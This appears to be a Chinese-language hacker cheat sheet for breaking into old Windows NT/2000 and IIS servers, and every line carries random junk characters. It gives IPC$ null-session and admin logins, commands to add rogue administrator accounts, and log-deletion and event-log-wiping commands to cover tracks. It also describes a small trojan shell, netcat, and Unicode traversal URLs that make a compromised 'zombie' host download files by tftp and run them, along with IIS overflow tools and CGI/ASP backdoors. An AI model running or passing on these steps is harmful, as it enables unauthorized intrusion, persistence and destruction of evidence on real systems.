网管和黑客都必须知道的命令
Wg{k$T_> 常用的几条NET命令:
M/x >51< +^*iZ6{+7 (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
PJxH7|GSi '(?
uPr (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
}:0uo5B7 (feTk72XX (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
'$4O!YI9@ e%8|<g+n6 (查看远程主机时间) net time \\IP地址
DD" $1o" 1/p*tZP8i (定时启动某个程序) at \\IP地址 02:18 readme.exe
{G <kA(Lm syU9O&< (查看共享) net view \\IP地址
y/e2l dz~co Z9 (查看netbios工作组列表) nbtstat -A IP地址
vR0];{ cvwhSdZu8 (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
dKl^jsd hTP:[w) (这两条把自己增加到管理员组): net user 用户名 密码 /add
6wco&7 l3N I$Zu net localgroup Administrators 用户名 /add
3=-4%%[M@ G-9iowS/A (断开连接) net use \\IP地址\ipc$ /delete
l5l>d62 I`z@2Z+pJ 扫尾:
+T9:Udi BpX6aAx del C:\winnt\system32\logfiles\*.*
n| GaV hhoEb(BA del C:\winnt\ssytem32\config\*.evt
Y#!h9F 4f(Kt,0 del C:\winnt\system32\dtclog\*.*
6}FO[ V]*b4nX7 del C:\winnt\system32\*.log
fgihy FU=w(< R; del C:\winnt\system32\*.txt
Ra*e5 uEc<}pV del C:\winnt\*.txt
P0`Mdk371 0]HYP;E"U del C:\winnt\*.log
O;7)Hjw t CK,
6ytB 一、netsvc.exe
~4q5
k5., NEa>\K<\ 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
oK{ V7 PRNoqi3sY netsvc /list \\IP地址
nQ|r"|g vkLC-Mzm< netsvc schedule \\IP地址 /query
s,a}?W Be+0NXLVy netsvc \\IP地址 schedule /start
qRbf2; fO#vF.k% 二、OpenTelnet.exe
Lg"C ] Y.^=]-n, 远程启动主机的Telnet服务,并绑定端口到7878,例如:
L@JOGCYy {BHI1Uw OpenTelnet \\IP地址 用户名 密码 1 7878
\QU^>23 *%KKNT'* 然后就可以telnet到主机的7878端口,进入DOS方式下:
};'\~g,1 *.)tG telnet IP地址 7878
ioPUUUb) m|OO,gR 三、winshell.exe
B c2p(z4 a#T]*(Yq) 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
vFEQ7qI {nU=%w"\ p Path (查看winshell主程序的路径信息)
A<;SnXm <T[E=# b reBoot (重新启动机器)
bTQNb!& FZ8b7nJ)4m d shutDown (关闭机器)
9P{;HusNw (rg;IXAq% s Shell (执行后你就会看到可爱的“C:\>”)
i1RiGS vX ] Gf4, x eXit (退出本次登录会话,此命令并不终止winshell的运行)
trE{ FT r1fGJv1!o CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
}`+B=h-dW }<'5 z
qS 四、3389登陆器,GUI方式登录远程主机的
1{P'7IEj fA89|NTSUh 五、elsave.exe
LY+|[qka zRPeNdX 事件日志清除工具
c&L"N!4z 4V~?. elsave -s \\IP地址 -l "application" -C
Qyy.IPTP I[n^{8gz elsave -s \\IP地址 -l "system" -C
%Z*sU/^ bu51$s?B elsave -s \\IP地址 -l "security" -C
V\6]n2 \}]!)}G 执行后成功清除应用程序日志,系统日志,安全日志
^n+ !4(@= <I"S#M7-s 六、hbulot.exe
a@R]X5[O xZV1k~C 开启win2kserver和winxp的3389服务
u_rdmyq$x/ _SA5e3# hbulot [/r]
cp o-. ;V<fB/S.=+ 使用/r表示安装完成后自动重起目标使设置生效。
fNrgdfo R i^[i}
七、nc.exe(netcat.exe)
+k`!QM>e- R"K#7{p9 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
a+Ac[> ~,*b }O 想要连接到某处: nc [-options] hostname port[s] [ports] ...
@'GGm#< ]7e =fM9V; 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
hqRw^2F 6"}?.E$ 参数:
\_B[{e7z %RDI!e<e} -e prog 程序重定向,一旦连接,就执行 [危险!!]
P
3'O/! x.q+uU$^ -g gateway source-routing hop point[s], up to 8
)&!&AlLn ?Ae ven -G num source-routing pointer: 4, 8, 12, ...
4rrSb* [}&Sxgv -h 帮助信息
>KJ+-QuO& ) Yd?m0m* -i secs 延时的间隔
$LU"?aAW v,ju!I0. -l 监听模式,用于入站连接
F+u|HiYG 9:M`
j -n 指定数字的IP地址,不能用hostname
F;]%V%F.X -a-(r'Qc( -o file 记录16进制的传输
[Jv@J\ #t+d iR -p port 本地端口号
YIjTL!bA" nvPwngEQm -r 任意指定本地及远程端口
KVJ_E!i w4gg@aO -s addr 本地源地址
|iwP:C^\mJ 8-O)Xx}cU -u UDP模式
LGtIm7 k1!@^A -v 详细输出——用两个-v可得到更详细的内容
Sy
'Dp9!| uS^Ipxe\ -w secs timeout的时间
yeMB0Z*r MNV%
=G -z 将输入输出关掉——用于扫描时
Gh}*q|Lz 八、TFTPD32.EXE
ukUGvK mWvl38 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
Q 7?#=N? Bs?^2T~%{ http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
{E8~Z8tT d N$Tf 然后可以直接令文件运行:
R47\Y L+q/){Dd( http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
>:b Q @/31IOIV]` 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
OE- gC2&Bm ~Rr~1I&mR, 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
3p'I5,} Cid
;z 一、一 Xscan命令行运行参数说明:
GmP@;[H" c??mL4$'N 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
HZ:6zH \*<d{gZ~ 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
&oX>*6L ^cuc.g)c$? xscan -file <主机列表文件名> <检测项目> [其他选项]
d}4Y( (}2~<
其中<检测项目> 含义如下:
% S os <q@a~'Ai?! -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
sL$:"= )<tI!I][j -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
zld#qG6 c.e2 M/ -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
i ,/0/?)*_ mVpMh#zw -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
PGoh1Uu J
G{3EWXR -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
sdo[D k1D@fiz [其他选项] 含义如下:
&*aIEa^ Nb'''W-iu -v: 显示详细扫描进度
V]db'qB\ VB*oGG -p: 跳过Ping不通的主机
\}|o1Xh2 Sxh]R+Xb -o: 跳过没有检测到开放端口的主机
Iepsz r<d_[?1N -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10